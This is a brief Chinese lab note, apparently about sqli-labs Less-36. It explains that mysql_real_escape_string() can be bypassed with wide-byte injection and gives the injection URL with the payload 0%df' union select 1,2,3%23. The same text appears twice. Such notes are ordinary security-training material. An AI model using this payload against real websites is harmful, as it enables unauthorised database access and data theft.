看一下mysql_real_escape_string()函数
x00 
x1a 
注入的关键还是在于闭合引号,同样使用宽字节注入
http://192.168.136.128/sqli-labs-master/Less-36/?id=0%df' union select 1,2,3%23
看一下mysql_real_escape_string()函数
x00
x1a
注入的关键还是在于闭合引号,同样使用宽字节注入
http://192.168.136.128/sqli-labs-master/Less-36/?id=0%df' union select 1,2,3%23